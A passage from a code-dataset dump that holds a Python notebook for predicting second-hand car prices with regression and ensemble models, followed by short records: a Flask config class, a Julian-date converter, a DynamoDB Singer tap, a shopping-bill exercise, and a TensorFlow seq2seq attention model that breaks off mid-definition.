box_scale):\n \"\"\"\n 利用箱线图去除异常值\n :param data_ser: 接收 pandas.Series 数据格式\n :param box_scale: 箱线图尺度,\n :return:\n \"\"\"\n iqr = box_scale * (data_ser.quantile(0.75) - data_ser.quantile(0.25))\n val_low = data_ser.quantile(0.25) - iqr\n val_up = data_ser.quantile(0.75) + iqr\n rule_low = (data_ser < val_low)\n rule_up = (data_ser > val_up)\n return (rule_low, rule_up), (val_low, val_up)\n\n data_n = data.copy()\n data_series = data_n[col_name]\n rule, value = box_plot_outliers(data_series, box_scale=scale)\n index = np.arange(data_series.shape[0])[rule[0] | rule[1]]\n print(\"Delete number is: {}\".format(len(index)))\n data_n = data_n.drop(index)\n data_n.reset_index(drop=True, inplace=True)\n print(\"Now column number is: {}\".format(data_n.shape[0]))\n index_low = np.arange(data_series.shape[0])[rule[0]]\n outliers = data_series.iloc[index_low]\n print(\"Description of data less than the lower bound is:\")\n print(pd.Series(outliers).describe())\n index_up = np.arange(data_series.shape[0])[rule[1]]\n outliers = data_series.iloc[index_up]\n print(\"Description of data larger than the upper bound is:\")\n print(pd.Series(outliers).describe())\n \n fig, ax = plt.subplots(1, 2, figsize=(10, 7))\n sns.boxplot(y=data[col_name], data=data, palette=\"Set1\", ax=ax[0])\n sns.boxplot(y=data_n[col_name], data=data_n, palette=\"Set1\", ax=ax[1])\n return data_n\n\n\n# %%\nTrain_data = outliers_proc(Train_data, 'power', scale = 3)\n\n\n# %%\n# 合并数据集方便处理\nTrain_data['train'] = 1\nTest_data['train'] = 0\ndata = pd.concat([Train_data, Test_data], ignore_index = False)\n\n\n# %%\n# used_time: 使用时间\n# 参数 errors = 'coerce': 将不能转化的数据(如格式错误)转化为 NaN\ndata['used_time'] = (pd.to_datetime(data['creatDate'], format='%Y%m%d', errors = 'coerce') - \n pd.to_datetime(data['regDate'], format='%Y%m%d', errors = 'coerce')).dt.days\nprint(\"NULL in used_time\", data['used_time'].isnull().sum())\n\n\n# %%\n# 从邮编中提取城市信息,相当于加入了先验知识\ndata['city'] = data['regionCode'].apply(lambda x : str(x)[:-3])\ndata = data # 话说这句干啥来着\n\n\n# %%\n# 计算某品牌的销售统计量\n# 这里要以 train 的数据计算统计量\nTrain_gb = Train_data.groupby(\"brand\")\nall_info = {}\nfor kind, kind_data in Train_gb:\n info = {}\n kind_data = kind_data[kind_data['price'] > 0]\n info['brand_amount'] = len(kind_data)\n info['brand_price_max'] = kind_data.price.max()\n info['brand_price_median'] = kind_data.price.median()\n info['brand_price_min'] = kind_data.price.min()\n info['brand_price_sum'] = kind_data.price.sum()\n info['brand_price_std'] = kind_data.price.std()\n info['brand_price_average'] = round(kind_data.price.sum() / (len(kind_data) + 1), 2)\n all_info[kind] = info\nbrand_fe = pd.DataFrame(all_info).T.reset_index().rename(columns={\"index\": \"brand\"})\ndata = data.merge(brand_fe, how='left', on='brand')\n\n\n# %%\n# 以power为例做数据分箱\n\nbin = [i*10 for i in range(31)]\ndata['power_bin'] = pd.cut(data['power'], bin, labels=False)\ndata[['power_bin', 'power']].head()\n\n\n# %%\n# 删除不需要的数据\ndata = data.drop(['creatDate', 'regDate', 'regionCode'], axis=1)\n\n\n# %%\nprint(data.shape)\ndata.columns\n\n\n# %%\n# 导出数据\ndata.to_csv('data_for_tree.csv', index=0)\n\n\n# %%\n# 通过调整数据类型,帮助我们减少数据在内存中占用的空间\n\ndef reduce_mem_usage(df):\n \"\"\" iterate through all the columns of a dataframe and modify the data type\n to reduce memory usage. \n \"\"\"\n start_mem = df.memory_usage().sum() \n print('Memory usage of dataframe is {:.2f} MB'.format(start_mem))\n \n for col in df.columns:\n col_type = df[col].dtype\n \n if col_type != object:\n c_min = df[col].min()\n c_max = df[col].max()\n if str(col_type)[:3] == 'int':\n if c_min > np.iinfo(np.int8).min and c_max < np.iinfo(np.int8).max:\n df[col] = df[col].astype(np.int8)\n elif c_min > np.iinfo(np.int16).min and c_max < np.iinfo(np.int16).max:\n df[col] = df[col].astype(np.int16)\n elif c_min > np.iinfo(np.int32).min and c_max < np.iinfo(np.int32).max:\n df[col] = df[col].astype(np.int32)\n elif c_min > np.iinfo(np.int64).min and c_max < np.iinfo(np.int64).max:\n df[col] = df[col].astype(np.int64) \n else:\n if c_min > np.finfo(np.float16).min and c_max < np.finfo(np.float16).max:\n df[col] = df[col].astype(np.float16)\n elif c_min > np.finfo(np.float32).min and c_max < np.finfo(np.float32).max:\n df[col] = df[col].astype(np.float32)\n else:\n df[col] = df[col].astype(np.float64)\n else:\n df[col] = df[col].astype('category')\n\n end_mem = df.memory_usage().sum() \n print('Memory usage after optimization is: {:.2f} MB'.format(end_mem))\n print('Decreased by {:.1f}%'.format(100 * (start_mem - end_mem) / start_mem))\n return df\n\n\n# %%\nsample_feature = reduce_mem_usage(pd.read_csv('data_for_tree.csv'))\n\n\n# %%\ncontinuous_feature_names = [x for x in sample_feature.columns if x not in ['price','brand','model','brand']]\ncontinuous_feature_names\n\n# %% [markdown]\n# ### OLS\n\n# %%\nsample_feature = sample_feature.dropna().replace('-', 0).reset_index(drop=True)\nsample_feature['notRepairedDamage'] = sample_feature['notRepairedDamage'].astype(np.float32)\n\ntrain = sample_feature[continuous_feature_names + ['price']]\ntrain_X = train[continuous_feature_names]\ntrain_y = train['price']\n\n\n# %%\nfrom sklearn.linear_model import LinearRegression\n\nmodel = LinearRegression(normalize=True)\nmodel = model.fit(train_X, train_y)\n\n# 查看截距和系数\n'intercept:'+ str(model.intercept_)\n\nsorted(dict(zip(continuous_feature_names, model.coef_)).items(), key=lambda x:x[1], reverse=True)\n\n\n# %%\nfrom matplotlib import pyplot as plt\n\nsubsample_index = np.random.randint(low=0, high=len(train_y), size=50)\n\nplt.scatter(train_X['v_9'][subsample_index], train_y[subsample_index], color='black')\nplt.scatter(train_X['v_9'][subsample_index], model.predict(train_X.loc[subsample_index]), color='blue')\nplt.xlabel('v_9')\nplt.ylabel('price')\nplt.legend(['True Price','Predicted Price'],loc='upper right')\nprint('The predicted price is obvious different from true price')\nplt.show()\n\n\n# %%\n# 标签并不服从正态分布,不满足OLS的基本假设\n\nimport seaborn as sns\nprint('It is clear to see the price shows a typical exponential distribution')\nplt.figure(figsize=(15,5))\nplt.subplot(1,2,1)\nsns.distplot(train_y)\nplt.subplot(1,2,2)\nsns.distplot(train_y[train_y < np.quantile(train_y, 0.9)])\n\n\n# %%\n# 对数变换\ntrain_y_ln = np.log(train_y + 1)\n\nimport seaborn as sns\nprint('The transformed price seems like normal distribution')\nplt.figure(figsize=(15,5))\nplt.subplot(1,2,1)\nsns.distplot(train_y_ln)\nplt.subplot(1,2,2)\nsns.distplot(train_y_ln[train_y_ln < np.quantile(train_y_ln, 0.9)])\n\n\n# %%\nmodel = model.fit(train_X, train_y_ln)\n\nprint('intercept:'+ str(model.intercept_))\nsorted(dict(zip(continuous_feature_names, model.coef_)).items(), key=lambda x:x[1], reverse=True)\n\n\n# %%\nplt.scatter(train_X['v_9'][subsample_index], train_y[subsample_index], color='black')\nplt.scatter(train_X['v_9'][subsample_index], np.exp(model.predict(train_X.loc[subsample_index])), color='blue')\nplt.xlabel('v_9')\nplt.ylabel('price')\nplt.legend(['True Price','Predicted Price'],loc='upper right')\nprint('The predicted price seems normal after np.log transforming')\nplt.show()\n\n# %% [markdown]\n# ### 5-fold CV\n\n# %%\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.metrics import mean_absolute_error, make_scorer\n\ndef log_transfer(func):\n def wrapper(y, yhat):\n result = func(np.log(y), np.nan_to_num(np.log(yhat)))\n return result\n return wrapper\n\nscores = cross_val_score(model, X=train_X, y=train_y, \n verbose=1, cv = 5, \n scoring=make_scorer(log_transfer(mean_absolute_error)))\n\n\n# %%\n# 未处理标签\nprint('AVG:', np.mean(scores))\n\n\n# %%\n# 处理标签\nscores = cross_val_score(model, X=train_X, y=train_y_ln, \n verbose=1, cv = 5, \n scoring=make_scorer(mean_absolute_error))\n\nprint('AVG:', np.mean(scores))\n\n\n# %%\nscores = pd.DataFrame(scores.reshape(1,-1))\nscores.columns = ['cv' + str(x) for x in range(1, 6)]\nscores.index = ['MAE']\nscores\n\n# %% [markdown]\n# ### 按时间4:1切分数据集\n\n# %%\nimport datetime\n\n\n# %%\nsample_feature = sample_feature.reset_index(drop=True)\nsplit_point = len(sample_feature) // 5 * 4\n\n\n# %%\ntrain = sample_feature.loc[:split_point].dropna()\nval = sample_feature.loc[split_point:].dropna()\n\n\n# %%\ntrain_X = train[continuous_feature_names]\ntrain_y_ln = np.log(train['price'] + 1)\nval_X = val[continuous_feature_names]\nval_y_ln = np.log(val['price'] + 1)\n\n\n# %%\nmodel = model.fit(train_X, train_y_ln)\nmean_absolute_error(val_y_ln, model.predict(val_X))\n\n\n# %%\n# 学习曲线\n\nfrom sklearn.model_selection import learning_curve, validation_curve\n\n\n# %%\ndef plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,n_jobs=1, train_size=np.linspace(.1, 1.0, 5 )): \n plt.figure() \n plt.title(title) \n if ylim is not None: \n plt.ylim(*ylim) \n plt.xlabel('Training example') \n plt.ylabel('score') \n train_sizes, train_scores, test_scores = learning_curve(estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_size, scoring = make_scorer(mean_absolute_error)) \n train_scores_mean = np.mean(train_scores, axis=1) \n train_scores_std = np.std(train_scores, axis=1) \n test_scores_mean = np.mean(test_scores, axis=1) \n test_scores_std = np.std(test_scores, axis=1) \n plt.grid()#区域 \n plt.fill_between(train_sizes, train_scores_mean - train_scores_std, \n train_scores_mean + train_scores_std, alpha=0.1, \n color=\"r\") \n plt.fill_between(train_sizes, test_scores_mean - test_scores_std, \n test_scores_mean + test_scores_std, alpha=0.1, \n color=\"g\") \n plt.plot(train_sizes, train_scores_mean, 'o-', color='r', \n label=\"Training score\") \n plt.plot(train_sizes, test_scores_mean,'o-',color=\"g\", \n label=\"Cross-validation score\") \n plt.legend(loc=\"best\") \n return plt \n\n\n# %%\nplot_learning_curve(LinearRegression(), 'Liner_model', \n train_X[:1000], train_y_ln[:1000], \n ylim=(0.0, 0.5), cv=5, n_jobs=1) \n\n# %% [markdown]\n# ### 多个模型对比\n\n# %%\ntrain = sample_feature[continuous_feature_names + ['price']].dropna()\n\ntrain_X = train[continuous_feature_names]\ntrain_y = train['price']\ntrain_y_ln = np.log(train_y + 1)\n\n# %% [markdown]\n# ### Ridge Regression & Lasso\n\n# %%\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Ridge\nfrom sklearn.linear_model import Lasso\n\n\n# %%\nmodels = [LinearRegression(),\n Ridge(),\n Lasso()]\n\nresult = dict()\n\n\n# %%\nfor model in models:\n model_name = str(model).split('(')[0]\n scores = cross_val_score(model, X=train_X, y=train_y_ln, verbose=0, cv = 5, scoring=make_scorer(mean_absolute_error))\n result[model_name] = scores\n print(model_name + ' is finished')\n\n\n# %%\n# 合并结果对比\n\nresult = pd.DataFrame(result)\nresult.index = ['cv' + str(x) for x in range(1, 6)]\nresult\n\n\n# %%\nmodel = LinearRegression().fit(train_X, train_y_ln)\nprint('intercept:'+ str(model.intercept_))\nsns.barplot(abs(model.coef_), continuous_feature_names)\n\n\n# %%\nmodel = Ridge().fit(train_X, train_y_ln)\nprint('intercept:'+ str(model.intercept_))\nsns.barplot(abs(model.coef_), continuous_feature_names)\n\n\n# %%\nmodel = Lasso().fit(train_X, train_y_ln)\nprint('intercept:'+ str(model.intercept_))\nsns.barplot(abs(model.coef_), continuous_feature_names)\n\n# %% [markdown]\n# ### Nonlinear Model\n\n# %%\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.neural_network import MLPRegressor\nfrom xgboost.sklearn import XGBRegressor\nfrom lightgbm.sklearn import LGBMRegressor\n\n\n# %%\nmodels = [LinearRegression(),\n DecisionTreeRegressor(),\n RandomForestRegressor(),\n GradientBoostingRegressor(),\n MLPRegressor(solver='lbfgs', max_iter=100), \n XGBRegressor(n_estimators = 100, objective='reg:squarederror'), \n LGBMRegressor(n_estimators = 100)]\n\n\n# %%\nresult = dict()\nfor model in models:\n model_name = str(model).split('(')[0]\n scores = cross_val_score(model, X=train_X, y=train_y_ln, verbose=0, cv = 5, scoring=make_scorer(mean_absolute_error))\n result[model_name] = scores\n print(model_name + ' is finished')\n\n\n# %%\nresult = pd.DataFrame(result)\nresult.index = ['cv' + str(x) for x in range(1, 6)]\nresult\n\n# %% [markdown]\n# ### 假装有分割线\n\n# %%\ndef build_model_lr(x_train,y_train):\n reg_model = linear_model.LinearRegression()\n reg_model.fit(x_train,y_train)\n return reg_model\n\ndef build_model_ridge(x_train,y_train):\n reg_model = linear_model.Ridge(alpha=0.8)#alphas=range(1,100,5)\n reg_model.fit(x_train,y_train)\n return reg_model\n\ndef build_model_lasso(x_train,y_train):\n reg_model = linear_model.LassoCV()\n reg_model.fit(x_train,y_train)\n return reg_model\n\ndef build_model_gbdt(x_train,y_train):\n estimator =GradientBoostingRegressor(loss='ls',subsample= 0.85,max_depth= 5,n_estimators = 100)\n param_grid = { \n 'learning_rate': [0.05,0.08,0.1,0.2],\n }\n gbdt = GridSearchCV(estimator, param_grid,cv=3)\n gbdt.fit(x_train,y_train)\n print(gbdt.best_params_)\n # print(gbdt.best_estimator_ )\n return gbdt\n\ndef build_model_xgb(x_train,y_train):\n model = xgb.XGBRegressor(n_estimators=120, learning_rate=0.08, gamma=0, subsample=0.8, colsample_bytree=0.9, max_depth=5) #, objective ='reg:squarederror'\n model.fit(x_train, y_train)\n return model\n\ndef build_model_lgb(x_train,y_train):\n estimator = lgb.LGBMRegressor(num_leaves=63,n_estimators = 100)\n param_grid = {\n 'learning_rate': [0.01, 0.05, 0.1],\n }\n gbm = GridSearchCV(estimator, param_grid)\n gbm.fit(x_train, y_train)\n return gbm\n\n\n# %%\nnumerical_cols = data.select_dtypes(exclude = 'object').columns\nnumerical_cols\n\n\n# %%\n# feature_cols = [col for col in numerical_cols if col not in ['SaleID','name','regDate','price']]\nfeature_cols = [col for col in numerical_cols if col not in ['SaleID','name','regDate','price','creatDate','regionCode','notRepairedDamage','train']]\nprint(feature_cols)\n\n\n# %%\nX_data = (data[data[\"train\"] == 1])[feature_cols]\nY_data = (data[data[\"train\"] == 1])[\"price\"]\nX_test = (data[data[\"train\"] == 0])[feature_cols]\n\nX_data = X_data.fillna(-1)\nX_test = X_test.fillna(-1)\n\nprint('X train shape:',X_data.shape)\nprint('X test shape:',X_test.shape)\n\n# %% [markdown]\n# ### XGBoost的五折交叉回归验证实现\n\n# %%\n## xgb\n\nimport xgboost as xgb\nimport lightgbm as lgb\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn import linear_model\nfrom sklearn import preprocessing\nfrom sklearn.svm import SVR\nfrom sklearn.decomposition import PCA,FastICA,FactorAnalysis,SparsePCA\n\nimport matplotlib.gridspec as gridspec\nfrom sklearn import datasets\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.naive_bayes import GaussianNB \nfrom sklearn.ensemble import RandomForestClassifier\n# from mlxtend.classifier import StackingClassifier\nfrom sklearn.model_selection import cross_val_score, train_test_split\n# from mlxtend.plotting import plot_learning_curves\n# from mlxtend.plotting import plot_decision_regions\n\nfrom sklearn.model_selection import GridSearchCV,cross_val_score\nfrom sklearn.ensemble import RandomForestRegressor,GradientBoostingRegressor\n\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error\n\n\n# %%\n\n\nxgr = xgb.XGBRegressor(n_estimators=120, learning_rate=0.1, subsample=0.8, colsample_bytree=0.9, max_depth=7) # ,objective ='reg:squarederror'\n\nscores_train = []\nscores = []\n\n## 5折交叉验证方式\nsk=StratifiedKFold(n_splits=5,shuffle=True,random_state=0)\nfor train_ind,val_ind in sk.split(X_data,Y_data):\n \n train_x=X_data.iloc[train_ind].values\n train_y=Y_data.iloc[train_ind]\n val_x=X_data.iloc[val_ind].values\n val_y=Y_data.iloc[val_ind]\n \n xgr.fit(train_x,train_y)\n pred_train_xgb=xgr.predict(train_x)\n pred_xgb=xgr.predict(val_x)\n \n score_train = mean_absolute_error(train_y,pred_train_xgb)\n scores_train.append(score_train)\n score = mean_absolute_error(val_y,pred_xgb)\n scores.append(score)\n\nprint('Train mae:',np.mean(score_train))\nprint('Val mae',np.mean(scores))\n\n# %% [markdown]\n# ### 用多种方法\n\n# %%\n## Split data with val\nx_train,x_val,y_train,y_val = train_test_split(X_data,Y_data,test_size=0.3)\n\n## Train and Predict\nprint('Predict LR...')\nmodel_lr = build_model_lr(x_train,y_train)\nval_lr = model_lr.predict(x_val)\nsubA_lr = model_lr.predict(X_test)\n\nprint('Predict Ridge...')\nmodel_ridge = build_model_ridge(x_train,y_train)\nval_ridge = model_ridge.predict(x_val)\nsubA_ridge = model_ridge.predict(X_test)\n\nprint('Predict Lasso...')\nmodel_lasso = build_model_lasso(x_train,y_train)\nval_lasso = model_lasso.predict(x_val)\nsubA_lasso = model_lasso.predict(X_test)\n\nprint('Predict GBDT...')\nmodel_gbdt = build_model_gbdt(x_train,y_train)\nval_gbdt = model_gbdt.predict(x_val)\nsubA_gbdt = model_gbdt.predict(X_test)\n\n\n# %%\nprint('predict XGB...')\nmodel_xgb = build_model_xgb(x_train,y_train)\nval_xgb = model_xgb.predict(x_val)\nsubA_xgb = model_xgb.predict(X_test)\n\nprint('predict lgb...')\nmodel_lgb = build_model_lgb(x_train,y_train)\nval_lgb = model_lgb.predict(x_val)\nsubA_lgb = model_lgb.predict(X_test)\n\n# %% [markdown]\n# ### 加权融合\n\n# %%\ndef Weighted_method(test_pre1,test_pre2,test_pre3,w=[1/3,1/3,1/3]):\n Weighted_result = w[0]*pd.Series(test_pre1)+w[1]*pd.Series(test_pre2)+w[2]*pd.Series(test_pre3)\n return Weighted_result\n\n## Init the Weight\nw = [0.3,0.4,0.3]\n\n## 测试验证集准确度\nval_pre = Weighted_method(val_lgb,val_xgb,val_gbdt,w)\nMAE_Weighted = mean_absolute_error(y_val,val_pre)\nprint('MAE of Weighted of val:',MAE_Weighted)\n\n## 预测数据部分\nsubA = Weighted_method(subA_lgb,subA_xgb,subA_gbdt,w)\n\n## 生成提交文件\nsub = pd.DataFrame()\nsub['SaleID'] = X_test.index\nsub['price'] = subA\nsub.to_csv('./sub_Weighted.csv',index=False)\n\n\n# %%\n## 与简单的LR(线性回归)进行对比\nval_lr_pred = model_lr.predict(x_val)\nMAE_lr = mean_absolute_error(y_val,val_lr_pred)\nprint('MAE of lr:',MAE_lr)\n\n# %% [markdown]\n# ### Starking 融合\n\n# %%\n## Starking\n\n## 第一层\ntrain_lgb_pred = model_lgb.predict(x_train)\ntrain_xgb_pred = model_xgb.predict(x_train)\ntrain_gbdt_pred = model_gbdt.predict(x_train)\n\nStrak_X_train = pd.DataFrame()\nStrak_X_train['Method_1'] = train_lgb_pred\nStrak_X_train['Method_2'] = train_xgb_pred\nStrak_X_train['Method_3'] = train_gbdt_pred\n\nStrak_X_val = pd.DataFrame()\nStrak_X_val['Method_1'] = val_lgb\nStrak_X_val['Method_2'] = val_xgb\nStrak_X_val['Method_3'] = val_gbdt\n\nStrak_X_test = pd.DataFrame()\nStrak_X_test['Method_1'] = subA_lgb\nStrak_X_test['Method_2'] = subA_xgb\nStrak_X_test['Method_3'] = subA_gbdt\n\n\n# %%\nStrak_X_test.head()\n\n\n# %%\n## level2-method \nmodel_lr_Stacking = build_model_lr(Strak_X_train,y_train)\n## 训练集\ntrain_pre_Stacking = model_lr_Stacking.predict(Strak_X_train)\nprint('MAE of Stacking-LR:',mean_absolute_error(y_train,train_pre_Stacking))\n\n## 验证集\nval_pre_Stacking = model_lr_Stacking.predict(Strak_X_val)\nprint('MAE of Stacking-LR:',mean_absolute_error(y_val,val_pre_Stacking))\n\n## 预测集\nprint('Predict Stacking-LR...')\nsubA_Stacking = model_lr_Stacking.predict(Strak_X_test)\n\n\n# %%\nsubA_Stacking[subA_Stacking<10]=10 ## 去除过小的预测值\n\nsub = pd.DataFrame()\nsub['SaleID'] = Test_data.SaleID\nsub['price'] = subA_Stacking\nsub.to_csv('./sub_Stacking.csv',index=False)\n\n\n# %%\n\n\n","sub_path":"SecondhandCarPrediction/finalPY.py","file_name":"finalPY.py","file_ext":"py","file_size_in_byte":23085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"254110082","text":"import os\n# uncomment the line below for postgres database url from environment variable\n# postgres_local_base = os.environ['DATABASE_URL']\n# app/main/config.py\nclass Config:\n DB = {\n 'addr' : 'localhost',\n 'id' : 'root',\n 'pass' : 'root'\n }\n SECRET_KEY = os.getenv('SECRET_KEY', 'my_precious_secret_key')\n DEBUG = False\n\nclass DevelopmentConfig(Config):\n print('i am Dev config')\n DEBUG = True\n Config.DB['addr'] = '127.0.0.1'\n Config.DB['db'] = 'dev_table'\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n\nclass TestingConfig(Config):\n print('i am Testing config')\n Config.DB['addr'] = '255.255.255.255'\n Config.DB['db'] = 'test_table'\n DEBUG = True\n TESTING = True\n PRESERVE_CONTEXT_ON_EXCEPTION = False\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n\nclass ProductionConfig(Config):\n print('i am Prod config')\n DEBUG = False\n\nconfig_by_name = dict(\n dev=DevelopmentConfig,\n test=TestingConfig,\n prod=ProductionConfig\n)\n\nkey = Config.SECRET_KEY","sub_path":"app/main/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"510297824","text":"# Function jd_to_dvec(jd), returns array A\n# Created by Jason Chen 10/5/18\n# Converts input of a Julian date (a float), jd, to an array A,\n# the equivalent Gregorian date [Year, Month, Day, Hour, Minute, Second]\n# Requires from jdcal import gcal2jd, jd2gcal\n\n\ndef jd_to_dvec(jd):\n ps = jd - 2400000.5 # Done to increase time precision\n epochvec = list(jd2gcal(2400000.5, ps)) # Converts tuple to list\n hours = int(epochvec[3]*24)\n # Sets jdarray[4] to decimal of hours\n epochvec.append(epochvec[3]*24 - hours)\n epochvec[3] = hours\n minutes = int(epochvec[4]*60)\n epochvec.append(epochvec[4]*60 - minutes)\n epochvec[4] = minutes\n epochvec[5] = (epochvec[5]*60)\n return epochvec\n","sub_path":"src/jd_to_dvec.py","file_name":"jd_to_dvec.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"479816055","text":"\"\"\"DynamoDB tap class.\"\"\"\n\nfrom typing import List\n\nfrom botocore.exceptions import ClientError\nfrom singer_sdk import Tap, Stream\nfrom singer_sdk import typing as th\n\nfrom tap_dynamodb.streams import DynamicStream\nfrom tap_dynamodb import dynamodb\nfrom tap_dynamodb.schema import flatten_json, infer_schema, merge_schemas\nfrom tap_dynamodb.sync_strategies.full_table import scan_table\nfrom tap_dynamodb.deserialize import Deserializer\n\n\nclass TapDynamoDB(Tap):\n \"\"\"DynamoDB tap class.\"\"\"\n name = \"tap-dynamodb\"\n\n config_jsonschema = th.PropertiesList(\n th.Property(\"region_name\", th.StringType, required=True),\n th.Property(\"account_id\", th.StringType, required=True),\n th.Property(\"external_id\", th.StringType, required=True),\n th.Property(\"role_name\", th.StringType, required=True),\n th.Property(\"use_local_dynamo\", th.BooleanType, default=False, required=False),\n th.Property('num_inference_records', th.NumberType, default=50, required=False),\n th.Property('tables_to_discover', th.ArrayType(th.StringType), default=[], required=False),\n ).to_dict()\n\n def discover_streams(self) -> List[Stream]:\n \"\"\"Return a list of discovered streams (i.e., DynamoDB tables for the given account and region).\"\"\"\n if not self.config.get('use_local_dynamo'):\n dynamodb.setup_aws_client(self.config)\n client = dynamodb.get_client(self.config)\n\n try:\n response = client.list_tables()\n except ClientError:\n raise Exception(\"Authorization to AWS failed. Please ensure the role and \"\n \"policy are configured correctly on your AWS account.\")\n\n config_table_list = self.config.get('tables_to_discover')\n table_list = config_table_list if config_table_list else response.get('TableNames')\n\n streams = [x for x in\n (self.discover_table_schema(client, table) for table in table_list)\n if x is not None]\n\n return streams\n\n def discover_table_schema(self, client, table_name):\n try:\n table_info = client.describe_table(TableName=table_name).get('Table', {})\n except ClientError:\n self.logger.info(f'Access to table {table_name} was denied, skipping')\n return None\n\n # write stream metadata\n key_props = [key_schema.get('AttributeName') for key_schema in table_info.get('KeySchema', [])]\n results = scan_table(table_name, None, None, self.config, True)\n\n orig_projection = ''\n schema = th.PropertiesList().to_dict()\n for result in results:\n i = 0\n for item in result.get('Items', []):\n orig_projection = \",\".join(item.keys())\n record = Deserializer().deserialize_item(item)\n\n if type(record) is not dict:\n raise ValueError(\"Input must be a dict object.\")\n\n flat_record = flatten_json(record, self.config.get('except_keys', []))\n new_schema = infer_schema(flat_record)\n schema = merge_schemas(schema, new_schema.to_dict())\n\n i += 1\n if i > self.config.get('num_inference_records', 50):\n break\n break\n\n return DynamicStream(\n tap=self,\n name=table_name,\n primary_keys=key_props,\n replication_key=None,\n schema=schema,\n client=client,\n orig_projection=orig_projection,\n )\n","sub_path":"tap_dynamodb/tap.py","file_name":"tap.py","file_ext":"py","file_size_in_byte":3541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"466122026","text":"shopping_list = [\"banana\", \"orange\", \"apple\"]\n\nstock = {\n \"banana\": 6,\n \"apple\": 0,\n \"orange\": 32,\n \"pear\": 15\n}\n\nprices = {\n \"banana\": 4,\n \"apple\": 2,\n \"orange\": 1.5,\n \"pear\": 3\n}\n\n# Write your code below!\ndef compute_bill(food):\n total=0\n for f in food:\n if stock[f]>0:\n total+=prices[f]\n stock[f]-=1\n return total\n\nlloyd = {\n \"name\": [\"Lloyd\"],\n \"homework\": [],\n \"quizzes\": [],\n \"tests\": [],\n }\nprint(lloyd[\"name\"])","sub_path":"firstProj/firstProject.py","file_name":"firstProject.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"559381862","text":"import numpy as np\nimport tensorflow as tf\n\nclass Encoder(tf.keras.Model):\n def __init__(self,vocab_size,embeddings_dim,units,batch_size):\n super(Encoder,self).__init__()\n self.word_embeddings = tf.Variable(\n initial_value=tf.random.truncated_normal(shape=(vocab_size, embeddings_dim)),\n trainable=True\n )\n self.bigru_1=tf.keras.layers.Bidirectional(\n layer=tf.keras.layers.GRU(units=units,return_sequences=True,return_state=False),\n merge_mode=\"sum\"\n )\n self.bigru_2 = tf.keras.layers.Bidirectional(\n layer=tf.keras.layers.GRU(units=units, return_sequences=True, return_state=True),\n merge_mode = \"sum\"\n )\n\n\n def __call__(self,word_ids,mask,training=True):\n inputs=tf.nn.embedding_lookup(params=self.word_embeddings,ids=word_ids)\n outputs=self.bigru_1(inputs=inputs,mask=mask,training=training)\n outputs,states_f,states_b=self.bigru_2(inputs=outputs,mask=mask,training=training)\n states=states_f+states_b\n #print(\"encoder outputs:\\n\",outputs)\n #print(\"encoder state:\\n\",states)\n return outputs,states\n\n\nclass Decoder(tf.keras.Model):\n def __init__(self,vocab_size,embeddings_dim,units,batch_size):\n super(Decoder,self).__init__()\n self.word_embeddings = tf.Variable(\n initial_value=tf.random.truncated_normal(shape=(vocab_size, embeddings_dim)),\n trainable=True\n )\n self.gru_1 = tf.keras.layers.GRU(\n units=units,\n return_sequences=True,\n return_state=False\n )\n self.gru_2 = tf.keras.layers.GRU(\n units=units,\n return_sequences=True,\n return_state=True\n )\n\n self.attention = BahdanauAttention(hidden_units=units)\n self.linear=tf.keras.layers.Dense(units=vocab_size)\n\n\n def __call__(self, word_ids,pre_states,encoder_outputs):\n '''\n 解码器解码一个时间步的信息\n :param word_ids: 输入的word的id,形状为[batch_size,1],因为只有一个时间步\n :param pre_states: 解码器的上一个状态,形状为[batch_size,dim]\n :param encoder_outputs: encoder的全部输出,形状为[batch_size,max_time,dim]\n :return:\n '''\n inputs=tf.nn.embedding_lookup(params=self.word_embeddings,ids=word_ids) #[batch_size,1,embedding_dim]\n #print(\"decoder inputs.shape\",inputs)\n\n attention_weights, context_vector=self.attention(\n query=pre_states,\n keys=encoder_outputs,\n values=encoder_outputs\n )\n #print(\"attention_weights:\\n\",attention_weights)\n #print(\"contect vector:\\n\",context_vector)\n\n inputs=tf.concat(\n values=[inputs,tf.expand_dims(input=context_vector,axis=1)],\n axis=-1\n ) #[batch_size,1,embeddings_dim+encoder_dim]\n #print(\"decoder inputs.shape\",inputs)\n\n #output:[batch_size,1,hidden_units] states:[batch_size,hidden_units]\n outputs=self.gru_1(inputs=inputs,initial_state=pre_states)\n outputs, states = self.gru_2(inputs=outputs, initial_state=pre_states)\n outputs=tf.reshape(tensor=outputs,shape=(-1,outputs.shape[2])) #[batch_size,hidden_units]\n outputs=self.linear(outputs) #[batch_size,vocab_size]\n\n # print(\"decoder outputs:\\n\", outputs)\n # print(\"decoder state:\\n\", states)\n\n return outputs,states,attention_weights\n\n\n\nclass BahdanauAttention(tf.keras.Model):\n def __init__(self,hidden_units):\n '''\n BahdanuAttention初始化函数\n :param hidden_units: attention里面的全连接的隐藏层节点数\n '''\n super(BahdanauAttention,self).__init__()\n self.dense_w1=tf.keras.layers.Dense(units=hidden_units)\n self.dense_w2=tf.keras.layers.Dense(units=hidden_units)\n self.dense_v=tf.keras.layers.Dense(units=1)\n\n\n def 